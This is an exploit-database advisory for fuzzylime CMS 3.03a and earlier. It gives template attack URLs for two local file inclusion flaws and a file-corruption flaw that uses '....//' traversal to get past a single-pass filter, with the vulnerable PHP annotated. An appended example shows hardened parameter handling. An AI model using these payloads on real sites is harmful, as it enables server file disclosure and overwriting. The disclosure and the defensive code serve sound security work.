0day.today - Biggest Exploit Database in the World.
fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC
+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+------------------------------------------------------------------------+
| by staker                                                              |
| url: http://cms.fuzzylime.co.uk                                        |
+------------------------------------------------------------------------+

[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }

Vulnerable code: confirm.php (local file inclusion mq=off)
-----------------------------------------------------------------
1.  <?
2.  @extract($HTTP_GET_VARS);  <-------- {1}
3.  @extract($_GET);           <----------^

27. elseif(isset($e)) {                            <------- {2}
28.     $filename = "code/mailing/$list.inc.php";  <------- {3}
29.     @include $filename;                        <------- {4}
-----------------------------------------------------------------
1. extract() lets a GET parameter overwrite any variable that is not yet
   defined, so this works regardless of the register_globals setting.
2. $e is not defined, so it is taken from $_GET['e'].
3. $list is not defined, so it is taken from $_GET['list'].
4. $filename contains the $list variable and is then included.
-----------------------------------------------------------------

[2][LFI]

http://[target]/[path]/code/display.php?template= {file + nullbyte}

Vulnerable code: display.php (local file inclusion mq=0 & reg=on)
--------------------------------------------------------------------
98. if($_GET['print'] != "1") include "templates/${template}_f.php";
--------------------------------------------------------------------

[3][LFC]

http://[target]/[path]/code/display.php?usecache=1&s=....//settings
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte} (mq = off)

Vulnerable code: display.php (local file corruption register_gl=1)
-----------------------------------------------------------------
1.   <?
2.   $s = $_GET[s];
3.   $p = $_GET[p];
4.   $s = str_replace("../", "", $s);  <---------- {1}
5.   $p = str_replace("../", "", $p);
...
54.  $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.htm";  <---- {2}

100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) {  <--- {3}
101.     if($handle = fopen($cachefile, 'w')) { // Create the cache file  <-------- {4}
102.         $output = ob_get_contents();
103.         fputs($handle, $output);
104.
105.         fclose($handle);
106.     }
107. }
----------------------------------------------------------------------
1. Because of the filter at {1}, you have to use ....// to change
   directory: after the replacement, ....// becomes ../
2. $cachefile contains the $s variable.
3. If $usecache == 1, execution continues into the block.
4. The file named via the $s variable is overwritten.
-----------------------------------------------------------------------

# 0day.today [2024-07-02] #
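
Added example, not part of the original advisory or of the fuzzylime code base: a hardened way to read the list / s / template parameters, shown beside the single-pass filter from display.php. The function names (original_filter, get_param, safe_name, resolve_inside) and the temporary directory standing in for code/mailing/ are assumptions made for illustration; the sample inputs are constructed.

```php
<?php
// Added example, not fuzzylime code: function names are assumptions.

// display.php's filter: one pass only, so "....//" collapses to "../".
function original_filter(string $s): string {
    return str_replace("../", "", $s);
}

// Read one parameter explicitly instead of extract($_GET); arrays are refused.
function get_param(array $query, string $key): ?string {
    return isset($query[$key]) && is_string($query[$key]) ? $query[$key] : null;
}

// Allow-list: letters, digits, "_" and "-" only. Dots, slashes and NUL bytes
// are rejected outright rather than stripped.
function safe_name(?string $value): ?string {
    $ok = $value !== null && preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $value) === 1;
    return $ok ? $value : null;
}

// Defence in depth: the canonical path must still sit inside $baseDir.
function resolve_inside(string $baseDir, string $name, string $suffix): ?string {
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . $suffix);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    return strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0 ? $path : null;
}

// Constructed sandbox standing in for code/mailing/, with one valid list file.
$dir = sys_get_temp_dir() . '/mailing_demo_' . getmypid();
@mkdir($dir);
touch($dir . '/news.inc.php');

// Constructed query arrays, shaped as PHP would parse them into $_GET.
$queries = [['list' => 'news'], ['list' => '....//settings'],
            ['list' => "settings\0"], ['list' => ['x']]];
foreach ($queries as $query) {
    $raw  = get_param($query, 'list');
    $name = safe_name($raw);
    $path = $name === null ? null : resolve_inside($dir, $name, '.inc.php');
    printf("raw=%s filtered=%s accepted=%s\n",
        json_encode($raw, JSON_UNESCAPED_SLASHES),
        json_encode($raw === null ? null : original_filter($raw), JSON_UNESCAPED_SLASHES),
        json_encode($path !== null));
}
unlink($dir . '/news.inc.php');
rmdir($dir);
```

Only the plain name "news" is accepted; the "filtered" column shows what the original str_replace() would have passed on for the same input.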